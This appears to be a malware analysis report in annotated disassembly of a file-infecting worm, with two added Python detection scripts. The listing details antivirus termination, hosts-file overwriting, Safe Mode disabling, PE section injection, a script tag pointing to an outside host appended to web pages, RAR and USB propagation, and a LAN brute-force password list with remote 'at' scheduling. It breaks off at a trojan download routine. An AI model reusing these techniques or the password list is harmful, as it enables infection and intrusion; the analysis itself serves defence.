.text:00405293 mov eax, [ebp+AntiVirsName]
.text:00405296 movsx eax, byte ptr [eax]
.text:00405299 test eax, eax
.text:0040529B jz Over_2 ; first byte is 0: end of the list, exit
.text:004052A1 and [ebp+var_8], 0
.text:004052A5 jmp short loc_4052AE
.text:004052A7 Next_1: ; CODE XREF:
.text:004052A7 mov eax, [ebp+var_8]
.text:004052AA inc eax
.text:004052AB mov [ebp+var_8], eax
.text:004052AE loc_4052AE: ; CODE XREF:
.text:004052AE cmp [ebp+var_8], 4
.text:004052B2 jge short GoNext
.text:004052B4 mov [ebp+var_C], 1
.text:004052BB and [ebp+InBuffer], 0
.text:004052BF and [ebp+BytesReturned], 0
.text:004052C3 push [ebp+AntiVirsName] ; AV process name list
.text:004052C6 call CheckProcess ; check whether this process exists
.text:004052CB mov [ebp+InBuffer], eax
.text:004052CE cmp [ebp+InBuffer], 0
.text:004052D2 jnz short loc_4052D6 ; running: send the driver an IOCTL to terminate it
.text:004052D4 jmp short GoNext ; not running: probe the next name
.text:004052D6 loc_4052D6: ; CODE XREF:
.text:004052D6 push 0 ; lpOverlapped
.text:004052D8 lea eax, [ebp+BytesReturned]
.text:004052DB push eax ; lpBytesReturned
.text:004052DC push 0 ; nOutBufferSize
.text:004052DE push 0 ; lpOutBuffer
.text:004052E0 push 4 ; nInBufferSize
.text:004052E2 lea eax, [ebp+InBuffer]
.text:004052E5 push eax ; lpInBuffer
.text:004052E6 push 222264h ; dwIoControlCode
.text:004052EB push [ebp+hDevice] ; hDevice
.text:004052EE call ds:DeviceIoControl ; send IOCTL 222264h to the driver to terminate the AV process
.text:004052F4 mov [ebp+var_C], eax
.text:004052F7 cmp [ebp+var_C], 0
.text:004052FB jnz short SucessControl ; AV process terminated: jump
.text:004052FD jmp short GoNext
.text:004052FF SucessControl: ; CODE XREF:
.text:004052FF push 32h ; dwMilliseconds
.text:00405301 call ds:Sleep
.text:00405307 jmp short Next_1
.text:00405309 GoNext: ; CODE XREF:
.text:00405309 push 32h ; dwMilliseconds
.text:0040530B call ds:Sleep
.text:00405311 push [ebp+AntiVirsName] ; lpString
.text:00405314 call ds:lstrlenA
.text:0040531A mov ecx, [ebp+AntiVirsName]
.text:0040531D lea eax, [ecx+eax+1]
.text:00405321 mov [ebp+AntiVirsName], eax ; next AV process name
.text:00405324 jmp Next_2
Hijacking drivers\\etc\\hosts to block a series of web sites:
.text:004066DE mov [ebp+lpBuffer], offset a127_0_0_1Local ; "127.0.0.1 localhost\r\n"
.text:004066E5 and [ebp+NumberOfBytesWritten], 0
.text:004066E9 or [ebp+hObject], 0FFFFFFFFh
.text:004066ED push 104h ; size_t
.text:004066F2 push 0 ; int
.text:004066F4 lea eax, [ebp+FileName]
.text:004066FA push eax ; void *
.text:004066FB call memset
.text:00406700 add esp, 0Ch
.text:00406703 push offset SystemDirector
.text:00406708 push offset aSDriversEtcHos ; "%s\\drivers\\etc\\hosts"
.text:0040670D lea eax, [ebp+FileName]
.text:00406713 push eax ; LPSTR
.text:00406714 call ds:wsprintfA
.text:0040671A add esp, 0Ch
.text:0040671D push 0 ; hTemplateFile
.text:0040671F push 80h ; dwFlagsAndAttributes
.text:00406724 push 3 ; dwCreationDisposition
.text:00406726 push 0 ; lpSecurityAttributes
.text:00406728 push 3 ; dwShareMode
.text:0040672A push 0C0000000h ; dwDesiredAccess
.text:0040672F lea eax, [ebp+FileName]
.text:00406735 push eax ; lpFileName
.text:00406736 call ds:CreateFileA
.text:0040673C mov [ebp+hObject], eax
.text:0040673F push 0 ; lpOverlapped
.text:00406741 lea eax, [ebp+NumberOfBytesWritten]
.text:00406744 push eax ; lpNumberOfBytesWritten
.text:00406745 push [ebp+lpBuffer] ; lpString
.text:00406748 call ds:lstrlenA
.text:0040674E push eax ; nNumberOfBytesToWrite
.text:0040674F push [ebp+lpBuffer] ; lpBuffer
.text:00406752 push [ebp+hObject] ; hFile
.text:00406755 call ds:WriteFile ; write "127.0.0.1 localhost\r\n"
Deleting the registry keys to disable Safe Mode:
.text:00406963 push offset pszSubKey
; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
.text:00406968 push 80000002h ; hkey
.text:0040696D call ds:SHDeleteKeyA
.text:00406973 push offset aSystemCurren_0
; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
.text:00406978 push 80000002h ; hkey
.text:0040697D call ds:SHDeleteKeyA ; delete the SafeBoot keys to disable Safe Mode
Next comes file infection. It first checks whether "C:\\Program Files\\WinRAR\\Rar.exe" exists:
.text:0040634A push offset aCProgramFilesW ; "C:\\Program Files\\WinRAR\\Rar.exe"
.text:0040634F push offset pszPath ; lpString1
.text:00406354 call ds:lstrcpyA
.text:0040635A push offset pszPath ; pszPath
.text:0040635F call ds:PathFileExistsA
.text:00406365 mov CRar_exe, eax
Then it queries the drive type, skipping invalid drives and CD-ROM drives; when it meets one of those it loops back and continues with the next drive.
.text:004063C3 push [ebp+lpString] ; lpRootPathName
.text:004063C6 call ds:GetDriveTypeA ; get the drive type
.text:004063CC mov [ebp+DriveType], eax
.text:004063CF cmp [ebp+DriveType], 1 ; DRIVE_NO_ROOT_DIR or lower: invalid drive
.text:004063D3 jbe short Next_2
.text:004063D5 cmp [ebp+DriveType], 5
.text:004063D9 jz short Next_2 ; DRIVE_CDROM: jump
If the drive is usable it spawns a thread to infect files:
.text:004063DB push 0
.text:004063DD push 0
.text:004063DF mov eax, [ebp+lpString]
.text:004063E2 push dword ptr [eax] ; the file path is the thread parameter
.text:004063E4 push offset TaintFile_1 ; thread routine that infects files
.text:004063E9 push 0
.text:004063EB push 0
.text:004063ED call [ebp+CreateThread]
Before infecting a file it also checks the path so that system files are left alone, skipping WinRAR, WindowsUpdate, Windows NT, Windows Media Player, Outlook Express, NetMeeting, MSN Gaming Zone, Movie Maker, microsoft frontpage, Messenger, Internet Explorer, InstallShield Installation Information, ComPlus Applications, Common Files, RECYCLER, System Volume Information, Documents and Settings, WinNT and WINDOWS. The implementation:
.text:00406220 NextSysFlod:
.text:00406220 mov eax, [ebp+var_35C]
.text:00406226 inc eax
.text:00406227 mov [ebp+var_35C], eax
.text:0040622D loc_40622D:
.text:0040622D cmp [ebp+var_35C], 15h
.text:00406234 jge short loc_40625A
.text:00406236 mov eax, [ebp+var_35C]
.text:0040623C push lpString2[eax*4] ; lpString2
.text:00406243 push [ebp+lpString1] ; lpString1
.text:00406249 call ds:lstrcmpiA ; compare against the list of system directories
.text:0040624F test eax, eax
.text:00406251 jnz short Next_1
.text:00406253 jmp GoOutReturn ; do not infect files under system directories
.text:00406253 ; matched a system directory: return
.text:00406258 Next_1:
.text:00406258 jmp short NextSysFlod
It then walks the file system with FindFirstFile and FindNextFile and calls the infection routine on each file it finds.
Below is the main procedure for infecting exe files. It first creates a file mapping; through the mapping it changes the section count, the image size and the entry point address and adds a new section named .tc; it then seeks to the end of the file and writes the shellcode there together with the original OEP.
Constructing the new section:
.text:0040727B mov eax, [ebp+EndOfLastTriv]
.text:00407281 mov [ebp+var_50], eax
.text:00407284 mov [ebp+var_40], 0E0000020h ; section characteristics
.text:0040728B mov ax, word ptr byte_40BE6C
.text:00407291 mov [ebp+var_42], ax
.text:00407295 push 28h ; size_t
.text:00407297 lea eax, [ebp+ct.]
.text:0040729A push eax ; void *
.text:0040729B mov eax, [ebp+NTAddress]
.text:004072A1 add eax, [ebp+NTSecLen]
.text:004072A4 push eax ; void *
.text:004072A5 call memcpy ; copy the new section header into place
.text:004072AA add esp, 0Ch
.text:004072AD mov eax, [ebp+NTAddress]
.text:004072B3 movzx eax, word ptr [eax+6]
.text:004072B7 inc eax ; increment NumberOfSections
.text:004072B8 mov ecx, [ebp+NTAddress]
.text:004072BE mov [ecx+6], ax
.text:004072C2 mov eax, [ebp+NTAddress]
.text:004072C8 cmp dword ptr [eax+1Ch], 0
.text:004072CC jz short WriteShellCode ; jump ahead to write the shellcode
.text:004072E3 mov eax, [ebp+NTAddress] ; address of the NT header
.text:004072E9 mov ecx, [ebp+EndOfShellCode]
.text:004072EC mov [eax+28h], ecx ; patch AddressOfEntryPoint
.text:004072EF mov eax, [ebp+NTAddress]
.text:004072F5 mov eax, [eax+50h]
.text:004072F8 add eax, [ebp+var_5C]
.text:004072FB mov ecx, [ebp+NTAddress]
.text:00407301 mov [ecx+50h], eax ; enlarge SizeOfImage (offset 50h in the NT header)
.text:00407304 push [ebp+lpBaseAddress] ; lpBaseAddress
.text:00407307 call ds:UnmapViewOfFile
.text:0040731E push 2 ; dwMoveMethod
.text:00407320 push 0 ; lpDistanceToMoveHigh
.text:00407322 mov eax, [ebp+SplcaeEnd]
.text:00407328 add eax, [ebp+var_54]
.text:0040732B push eax ; lDistanceToMove
.text:0040732C push [ebp+hFile] ; hFile
.text:0040732F call ds:SetFilePointer
.text:00407335 push [ebp+hFile] ; hFile
.text:00407338 call ds:SetEndOfFile
.text:0040733E push 2 ; dwMoveMethod
.text:00407340 push 0 ; lpDistanceToMoveHigh
.text:00407342 xor eax, eax
.text:00407344 sub eax, [ebp+var_54]
.text:00407347 push eax ; lDistanceToMove
.text:00407348 push [ebp+hFile] ; hFile
.text:0040734B call ds:SetFilePointer ; seek to the end of the file
.text:00407351 push 0 ; lpOverlapped
.text:00407353 lea eax, [ebp+NumberOfBytesWritten]
.text:00407356 push eax ; lpNumberOfBytesWritten
.text:00407357 push 297h ; nNumberOfBytesToWrite
.text:0040735C push offset loc_409BA8 ; lpBuffer
.text:00407361 push [ebp+hFile] ; hFile
.text:00407364 call ds:WriteFile ; write the infection code (shellcode) into the exe
.text:0040736A push 0 ; lpOverlapped
.text:0040736C lea eax, [ebp+NumberOfBytesWritten]
.text:0040736F push eax ; lpNumberOfBytesWritten
.text:00407370 push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:00407376 push lpBuffer ; lpBuffer
.text:0040737C push [ebp+hFile] ; hFile
.text:0040737F call ds:WriteFile
.text:00407385 push 1 ; dwMoveMethod
.text:00407387 push 0 ; lpDistanceToMoveHigh
.text:00407389 xor eax, eax
.text:0040738B sub eax, nNumberOfBytesToWrite
.text:00407391 sub eax, 2Bh
.text:00407394 push eax ; lDistanceToMove
.text:00407395 push [ebp+hFile] ; hFile
.text:00407398 call ds:SetFilePointer
.text:0040739E push 0 ; lpOverlapped
.text:004073A0 lea eax, [ebp+NumberOfBytesWritten]
.text:004073A3 push eax ; lpNumberOfBytesWritten
.text:004073A4 push 4 ; nNumberOfBytesToWrite
.text:004073A6 push offset nNumberOfBytesToWrite ; lpBuffer
.text:004073AB push [ebp+hFile] ; hFile
.text:004073AE call ds:WriteFile
.text:004073B4 mov eax, [ebp+EndOfShellCode]
.text:004073B7 add eax, 297h
.text:004073BC mov ecx, [ebp+OEP] ; original OEP
.text:004073C2 sub ecx, eax
.text:004073C4 mov [ebp+Buffer], ecx ; store the OEP as an offset relative to the shellcode
.text:004073C7 push 2 ; dwMoveMethod
.text:004073C9 push 0 ; lpDistanceToMoveHigh
.text:004073CB xor eax, eax
.text:004073CD sub eax, [ebp+var_54]
.text:004073D0 push eax ; lDistanceToMove
.text:004073D1 push [ebp+hFile] ; hFile
.text:004073D4 call ds:SetFilePointer
.text:004073DA push 1 ; dwMoveMethod
.text:004073DC push 0 ; lpDistanceToMoveHigh
.text:004073DE push 293h ; lDistanceToMove
.text:004073E3 push [ebp+hFile] ; hFile
.text:004073E6 call ds:SetFilePointer
.text:004073EC push 0 ; lpOverlapped
.text:004073EE lea eax, [ebp+NumberOfBytesWritten]
.text:004073F1 push eax ; lpNumberOfBytesWritten
.text:004073F2 push 4 ; nNumberOfBytesToWrite
.text:004073F4 lea eax, [ebp+Buffer]
.text:004073F7 push eax ; lpBuffer
.text:004073F8 push [ebp+hFile] ; hFile
.text:004073FB call ds:WriteFile ; write the OEP into the infected exe
.text:00407401 push 1 ; int
.text:00407403 lea eax, [ebp+CreationTime]
.text:00407409 push eax ; lpCreationTime
.text:0040740A push [ebp+hFile] ; hFile
.text:0040740D call FileOldTime ; restore the infected file's original timestamps
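As an added example (not code from the original report or from the malware), the following Python check looks for the infection marker just described: a section named .tc with characteristics 0E0000020h into which the entry point has been redirected. The header offsets it reads (NT+6, NT+28h, NT+50h) are the same ones the listing patches; the sample PE headers are constructed inside the script.

```python
import struct

TC_NAME = b".tc"
TC_CHARACTERISTICS = 0xE0000020  # CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE, as in the listing
SECTION_FMT = "<8sIIIIIIHHI"     # IMAGE_SECTION_HEADER, 40 bytes

def build_pe(sections, entry_rva):
    """Build a tiny PE32 header blob (constructed test data, not a real binary).
    sections: list of (name, virtual_address, virtual_size, characteristics)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew -> NT header at 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)                                    # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 0x10, entry_rva)             # AddressOfEntryPoint (NT+28h)
    struct.pack_into("<I", opt, 0x38, 0x10000)               # SizeOfImage (NT+50h)
    hdrs = b"".join(struct.pack(SECTION_FMT, n, vs, va, vs, 0, 0, 0, 0, 0, ch)
                    for n, va, vs, ch in sections)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + hdrs

def check_jihu_marker(data):
    """Return a list of findings; an empty list means the .tc marker is absent."""
    nt = struct.unpack_from("<I", data, 0x3C)[0]
    if data[nt:nt + 4] != b"PE\0\0":
        return ["not a PE file"]
    nsec = struct.unpack_from("<H", data, nt + 6)[0]         # NumberOfSections (NT+6)
    opt_size = struct.unpack_from("<H", data, nt + 20)[0]
    entry = struct.unpack_from("<I", data, nt + 0x28)[0]     # AddressOfEntryPoint
    sec_off = nt + 24 + opt_size
    findings = []
    for i in range(nsec):
        name, vsize, va, *_, ch = struct.unpack_from(SECTION_FMT, data, sec_off + 40 * i)
        if name.rstrip(b"\0") != TC_NAME:
            continue
        findings.append("section .tc present")
        if ch == TC_CHARACTERISTICS:
            findings.append("section .tc has RWX characteristics 0xE0000020")
        if i == nsec - 1 and va <= entry < va + vsize:
            findings.append("entry point redirected into appended .tc section")
    return findings

# Constructed samples: a clean layout and one carrying the appended .tc section.
CLEAN_PE = build_pe([(b".text", 0x1000, 0x500, 0x60000020)], 0x1100)
INFECTED_PE = build_pe([(b".text", 0x1000, 0x500, 0x60000020),
                        (b".tc", 0x2000, 0x400, TC_CHARACTERISTICS)], 0x2010)

if __name__ == "__main__":
    print("clean:", check_jihu_marker(CLEAN_PE))
    print("infected:", check_jihu_marker(INFECTED_PE))
```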
For html, htm, asp and aspx files the string <script type="text/javascript" src="http://web.nba1001.net:8888/tj/tongji.js"></script> is appended to the end of the file. The implementation is as follows:
.text:00405AA9 push 0 ; hTemplateFile
.text:00405AAB push 80h ; dwFlagsAndAttributes
.text:00405AB0 push 3 ; dwCreationDisposition
.text:00405AB2 push 0 ; lpSecurityAttributes
.text:00405AB4 push 0 ; dwShareMode
.text:00405AB6 push 0C0000000h ; dwDesiredAccess
.text:00405ABB push [ebp+lpFileName] ; lpFileName
.text:00405ABE call ds:CreateFileA ; open a handle to the file
.text:00405AC4 mov [ebp+hFile], eax
.text:00405AC7 cmp [ebp+hFile], 0FFFFFFFFh
.text:00405ACB jnz short loc_405AD6
.text:00405ACD or [ebp+var_4], 0FFFFFFFFh
.text:00405AD1 jmp loc_405B6A
.text:00405AD6 loc_405AD6: ; CODE XREF:
.text:00405AD6 push 0 ; int
.text:00405AD8 lea eax, [ebp+CreationTime]
.text:00405ADB push eax ; lpCreationTime
.text:00405ADC push [ebp+hFile] ; hFile
.text:00405ADF call FileOldTime ; save the file's creation time
.text:00405AE4 push offset unk_40C690 ; lpString1
.text:00405AE9 push [ebp+hFile] ; hFile
.text:00405AEC call ReadMySlef
.text:00405AF1 test eax, eax
.text:00405AF3 jnz short loc_405B04
.text:00405AF5 push [ebp+hFile] ; hObject
.text:00405AF8 call ds:CloseHandle
.text:00405AFE or [ebp+var_4], 0FFFFFFFFh
.text:00405B02 jmp short loc_405B6A
.text:00405B04 loc_405B04: ; CODE XREF: TaintThisFile+117 j
.text:00405B04 push 2 ; dwMoveMethod
.text:00405B06 push 0 ; lpDistanceToMoveHigh
.text:00405B08 push 0 ; lDistanceToMove
.text:00405B0A push [ebp+hFile] ; hFile
.text:00405B0D call ds:SetFilePointer ; move the file pointer to the end
.text:00405B13 push 0 ; lpOverlapped
.text:00405B15 lea eax, [ebp+NumberOfBytesWritten]
.text:00405B18 push eax ; lpNumberOfBytesWritten
.text:00405B19 push offset unk_40C690 ; lpString
.text:00405B1E call ds:lstrlenA
.text:00405B24 push eax ; nNumberOfBytesToWrite
.text:00405B25 push offset unk_40C690 ; lpBuffer
.text:00405B2A push [ebp+hFile] ; hFile
.text:00405B2D call ds:WriteFile ; append the infection string to the file
.text:00405B33 push 1 ; int
.text:00405B35 lea eax, [ebp+CreationTime]
.text:00405B38 push eax ; lpCreationTime
.text:00405B39 push [ebp+hFile] ; hFile
.text:00405B3C call FileOldTime ; restore the earlier timestamp
.text:00405B41 push [ebp+hFile] ; hObject
.text:00405B44 call ds:CloseHandle
If the file is a RAR archive, execution jumps here. The virus invokes C:\\Program Files\\WinRAR\\Rar.exe with the arguments %s X -ibck \"%s\" \"%s\\\ to extract the archive into a temporary directory, then infects the extracted exe, rar, htm, html, asp and aspx files, and finally calls rar.exe with the arguments %s M -ibck -r -o+ -ep1 \"%s\" \"%s\\*\ to pack the files back into the archive.
.text:004060D9 TaintRAR: ; CODE XREF:
.text:004060D9 push offset aRar ; "rar"
.text:004060DE push [ebp+lpString1] ; lpString1
.text:004060E4 call ds:lstrcmpiA ; if the extension is rar, infection continues here
.text:004060EA test eax, eax
.text:004060EC jnz short GameOver
.text:004060EE and [ebp+hObject], 0
.text:004060F5 push 0 ; lpThreadId
.text:004060F7 push 0 ; dwCreationFlags
.text:004060F9 lea eax, [ebp+Parameter]
.text:004060FF push eax ; lpParameter
.text:00406100 push offset TaintRAR ; lpStartAddress
.text:00406105 push 0 ; dwStackSize
.text:00406107 push 0 ; lpThreadAttributes
.text:00406109 call ds:CreateThread ; start a new thread to infect the rar archive
.text:0040612D push 0FFFFFFFFh ; dwMilliseconds
.text:0040612F push [ebp+hObject] ; hHandle
.text:00406135 call ds:WaitForSingleObject ; wait for the rar-infection thread to finish
The infection procedure follows:
.text:00405C17 push 0
.text:00405C19 push 80h
.text:00405C1E push 3
.text:00405C20 push 0
.text:00405C22 push 3
.text:00405C24 push 0C0000000h
.text:00405C29 lea eax, [ebp+FileName]
.text:00405C2F push eax
.text:00405C30 call [ebp+CreateFileA] ; open the file
.text:00405C36 mov [ebp+hFile], eax
.text:00405C3C push 0 ; lpFileSizeHigh
.text:00405C3E push [ebp+hFile] ; hFile
.text:00405C44 call ds:GetFileSize
.text:00405C4A mov [ebp+var_40C], eax
.text:00405C50 cmp [ebp+var_40C], 0
.text:00405C57 jz short GoOutReturn ; zero-length file, exit
.text:00405C59 cmp [ebp+var_40C], 0FFFFFFFFh
.text:00405C60 jz short GoOutReturn ; GetFileSize failed, exit
.text:00405C62 cmp [ebp+var_40C], 0A00000h
.text:00405C6C ja short GoOutReturn ; file too large (over 0A00000h bytes), exit
.text:00405C6E cmp [ebp+var_40C], 2800h
.text:00405C78 jnb short loc_405C90
.text:00405C9F call FileOldTime ; get the file's original creation time
.text:00405D84 push eax ; lpStartupInfo
.text:00405D85 push 0 ; lpCurrentDirectory
.text:00405D87 push 0 ; lpEnvironment
.text:00405D89 push 0C000000h ; dwCreationFlags
.text:00405D8E push 1 ; bInheritHandles
.text:00405D90 push 0 ; lpThreadAttributes
.text:00405D92 push 0 ; lpProcessAttributes
.text:00405D94 lea eax, [ebp+CommandLine]
.text:00405D9A push eax ; lpCommandLine
.text:00405D9B push 0 ; lpApplicationName
.text:00405D9D call ds:CreateProcessA ; run C:\\Program Files\\WinRAR\\Rar.exe with the command line %s X -ibck \"%s\" \"%s\\\ to extract the archive
.text:00405E3B call TaintFile_0 ; after extraction, infect the files from the archive
.text:00405EB3 push eax ; lpStartupInfo
.text:00405EB4 push 0 ; lpCurrentDirectory
.text:00405EB6 push 0 ; lpEnvironment
.text:00405EB8 push 0C000000h ; dwCreationFlags
.text:00405EBD push 1 ; bInheritHandles
.text:00405EBF push 0 ; lpThreadAttributes
.text:00405EC1 push 0 ; lpProcessAttributes
.text:00405EC3 lea eax, [ebp+CommandLine]
.text:00405EC9 push eax ; lpCommandLine
.text:00405ECA push 0 ; lpApplicationName
.text:00405ECC call ds:CreateProcessA ; run the archiver again with "%s M -ibck -r -o+ -ep1 \"%s\" \"%s\\*\"" as the command line, packing the infected files back into the archive
.text:00405F03 push 0 ; hTemplateFile
.text:00405F05 push 80h ; dwFlagsAndAttributes
.text:00405F0A push 3 ; dwCreationDisposition
.text:00405F0C push 0 ; lpSecurityAttributes
.text:00405F0E push 3 ; dwShareMode
.text:00405F10 push 0C0000000h ; dwDesiredAccess
.text:00405F15 lea eax, [ebp+FileName]
.text:00405F1B push eax ; lpFileName
.text:00405F1C call ds:CreateFileA ; open the file in order to reset the infected rar's timestamps
.text:00405F22 mov [ebp+hFile], eax
.text:00405F28 push 1 ; int
.text:00405F2A lea eax, [ebp+CreationTime]
.text:00405F30 push eax ; lpCreationTime
.text:00405F31 push [ebp+hFile] ; hFile
.text:00405F37 call FileOldTime ; restore the infected RAR file's original timestamps
The drive-infection procedure follows. Drives are enumerated and their type is checked; if a drive is removable, the virus copies itself to
recycle.{645FF040-5081-101B-9F08-00AA002F954E}\setup.exe on that drive and creates an autorun.inf file. The procedure is as follows:
.text:00408B08 push eax
.text:00408B09 call [ebp+GetDriveTypeA]
.text:00408B0C cmp eax, 2
.text:00408B0F jnz short GoOutGetNext ; not a removable drive, skip
.text:00408B11 lea eax, [ebp+var_18]
.text:00408B14 push eax
.text:00408B15 call FautorunWR ; create autorun.inf on the drive
.text:0040870E push offset aSetup_exe ; "Setup.exe"
.text:00408713 lea eax, [ebp+PathName]
.text:00408719 push eax
.text:0040871A push offset aSS ; "%s\\%s"
.text:0040871F lea eax, [ebp+FileName]
.text:00408725 push eax ; LPSTR
.text:00408726 call ds:wsprintfA ; build the path recycle.{645FF040-5081-101B-9F08-00AA002F954E}\setup.exe
.text:00408836 push 1 ; dwFlags
.text:00408838 lea eax, [ebp+NewFileName]
.text:0040883E push eax ; lpNewFileName
.text:0040883F lea eax, [ebp+pszPath]
.text:00408845 push eax ; lpExistingFileName
.text:00408846 call ds:MoveFileExA ; copy itself to that path
The virus spreads over the LAN using the user names Administrator, Guest, Admin and Root
and the following passwords:
234.password.6969.harley.123456.golf.pussy.mustang. 1111.shadow.1313.fish.5150.7777.qwerty.baseball.2112.letmein.
12345678.12345.ccc.admin.5201314.qq520.1.12.123.1234567.
123456789.654321.54321.111.000000.abc.pw.11111111.
88888888.pass.passwd.database.abcd.abc123.pass.sybase.
123qwe.server.computer.520.super.123asd.0.ihavenopass.
godblessyou.enable.xp.2002.2003.2600.alpha.110.111111.
121212.123123.1234qwer.
123abc.007.a.aaa.patrick.pat.administrator.root.sex.god.
fuckyou.fuck.abc.test.test123.temp.temp123.win.pc.asdf.pwd.
qwer.yxcv.zxcv.home.xxx.owner.login.Login.pw123.love.mypc.
mypc123.admin123.mypass.mypass123.901100.
The LAN attack routine follows:
.text:004083F1 mov [ebp+lpUserName], offset UserName_0 ; first user name
.text:004083F8 UserNext:
.text:004083F8 mov eax, [ebp+lpUserName]
.text:004083FB movsx eax, byte ptr [eax]
.text:004083FE test eax, eax
.text:00408400 jz loc_408492
.text:00408406 cmp [ebp+var_4], 0
.text:0040840A jnz loc_408492
.text:00408410 mov [ebp+var_54], 1
.text:00408417 mov [ebp+lpPassword], offset UserPassword ; first password
PassWordNext:
.text:0040841E mov eax, [ebp+lpPassword]
.text:00408421 movsx eax, byte ptr [eax]
.text:00408424 test eax, eax
.text:00408426 jz short GetNextUserName
.text:00408428 cmp [ebp+var_54], 1
.text:0040842C jnz short SendVirToNet
.text:0040842E mov [ebp+lpPassword], offset UserName
.text:00408435 SendVirToNet: ; CODE XREF:
.text:00408435 push [ebp+lpPassword] ; lpPassword
.text:00408438 push [ebp+lpUserName] ; lpUserName
.text:0040843B lea eax, [ebp+String1]
.text:0040843E push eax ; int
.text:0040843F call SendVirNet ; upload the virus to the LAN host and schedule it to run 3 minutes later
.text:00408444 cmp eax, 1
.text:00408447 jnz short loc_408452
.text:00408449 mov [ebp+var_4], 1
.text:00408450 jmp short GetNextUserName
.text:00408452 loc_408452: ; CODE XREF:
.text:00408452 cmp [ebp+var_54], 1
.text:00408456 jnz short loc_408465
.text:00408458 mov [ebp+lpPassword], offset UserPassword
.text:0040845F and [ebp+var_54], 0
.text:00408463 jmp short GoNextPassWord ; loop back and try the next one
.text:00408465 loc_408465: ; CODE XREF:
.text:00408465 push [ebp+lpPassword] ; lpString
.text:00408468 call ds:lstrlenA
.text:0040846E mov ecx, [ebp+lpPassword]
.text:00408471 lea eax, [ecx+eax+1]
.text:00408475 mov [ebp+lpPassword], eax ; advance to the next password
.text:00408478 GoNextPassWord: ; CODE XREF:
.text:00408478 jmp short PassWordNext ; loop back and continue
.text:0040847A GetNextUserName: ; CODE XREF:
.text:0040847A push [ebp+lpUserName] ; lpString
.text:0040847D call ds:lstrlenA
.text:00408483 mov ecx, [ebp+lpUserName]
.text:00408486 lea eax, [ecx+eax+1]
.text:0040848A mov [ebp+lpUserName], eax ; advance to the next user name
.text:0040848D jmp UserNext
When uploading, an at command is first built that schedules the file to run three minutes after a successful upload; the upload destination is C:\CONFIG.EXE:
.text:00408354 push offset aConfig ; "CONFIG"
.text:00408359 movzx eax, [ebp+SystemTime.wMinute]
.text:00408360 add eax, 3
.text:00408363 push eax
.text:00408364 movzx eax, [ebp+SystemTime.wHour]
.text:0040836B push eax
.text:0040836C push [ebp+arg_0]
.text:0040836F push offset aAtSDDCS_exe ; "at \\\\%s %d:%d C:\\%s.exe"
.text:00408374 lea eax, [ebp+CmdLine]
.text:0040837A push eax ; format the at command line
.text:0040837B call [ebp+var_24]
.text:0040837E add esp, 18h
.text:00408381 push 0 ; uCmdShow
.text:00408383 lea eax, [ebp+CmdLine]
.text:00408389 push eax ; lpCmdLine
.text:0040838A call ds:WinExec ; run the at command
.text:00408397 push [ebp+hObject] ; hObject
.text:0040839A call ds:CloseHandle
.text:004083A0 loc_4083A0: ; CODE XREF:
.text:004083A0 push 1 ; fForce
.text:004083A2 push 1 ; dwFlags
.text:004083A4 lea eax, [ebp+Name]
.text:004083A7 push eax ; lpName
.text:004083A8 call WNetCancelConnection2A
The trojan-download procedure follows:
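As an added example, not part of the original report, the following Python detection flags the remote at scheduling pattern built by the format string above ("at \\\\%s %d:%d C:\\%s.exe") in process-creation log lines. The log line layout is an assumption made for this example, and the sample lines are constructed; note that the listing adds 3 to wMinute without wrapping at 60, so some of the generated times are invalid.

```python
import re

# Matches the worm's format string: at \\<host> <hour>:<minute> C:\<name>.exe
AT_PATTERN = re.compile(
    r"^at\s+\\\\(?P<host>\S+)\s+(?P<hour>\d{1,2}):(?P<minute>\d{1,2})"
    r"\s+(?P<path>C:\\[^\s\\]+\.exe)$",
    re.IGNORECASE,
)

# Constructed sample lines (assumed layout): "<timestamp> parent=<image> CommandLine=<cmd>"
SAMPLE_LOG = [
    "2010-03-14T17:55:12 parent=services.exe CommandLine=at \\\\192.0.2.10 17:58 C:\\CONFIG.exe",
    "2010-03-14T17:57:40 parent=cmd.exe CommandLine=at 09:00 /every:M backup.cmd",
    "2010-03-14T17:59:01 parent=services.exe CommandLine=at \\\\192.0.2.11 17:61 C:\\CONFIG.exe",
]

def parse_command_line(line):
    """Extract the CommandLine= field from one log line, or None if absent."""
    idx = line.find("CommandLine=")
    return None if idx < 0 else line[idx + len("CommandLine="):].strip()

def detect_remote_at(lines):
    """Return one finding per line whose command line matches the worm's remote at pattern."""
    findings = []
    for line in lines:
        cmd = parse_command_line(line)
        if cmd is None:
            continue
        m = AT_PATTERN.match(cmd)
        if not m:
            continue
        minute = int(m["minute"])
        findings.append({
            "host": m["host"],
            "path": m["path"],
            "time": f"{int(m['hour']):02d}:{minute:02d}",
            # wMinute + 3 is never reduced modulo 60 in the listing, so 60..62 can appear
            "invalid_time": minute > 59,
        })
    return findings

if __name__ == "__main__":
    for f in detect_remote_at(SAMPLE_LOG):
        print(f)
```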
.text:00402DAC GetNextIP:
.text:00402DAC xor eax, eax
.text:00402DAE inc eax
.text:00402DAF jz FailReturn
.text:00402DB5 push 40h ; size_t
.text:00402DB7 push 0 ; int
.text:00402DB9 lea eax, [ebp+String2]
.text:00402DBF push eax ; void *
.text:00402DC0 call memset
.text:00402DC5 add esp, 0Ch
.text:00402DC8 push 0 ; int
.text:00402DCA push 40h ; dwAddressStringLength
.text:00402DCC lea eax, [ebp+String2]
.text:00402DD2 push eax ; lpString2
.text:00402DD3 push [ebp+arg_8] ; int
.text:00402DD6 push [ebp+var_4] ; int
.text:00402DD9 call GetAddrInfo ; resolve the address
.text:00402DDE test eax, eax
.text:00402DE0 jnz short SucessGetAdd ; address resolved, go download the trojan
.text:00402DE2 and [ebp+var_8], 0
.text:00402DE6 jmp short FailReturn ; address resolution failed, exit
.text:00402DE8 SucessGetAdd:
.text:00402DE8 push 400h ; size_t
.text:00402DED push 0 ; int
.text:00402DEF lea eax, [ebp+var_410]
.text:00402DF5 push eax ; void *
.text:00402DF6 call memset
.text:00402DFB add esp, 0Ch
.text:00402DFE push [ebp+arg_4]
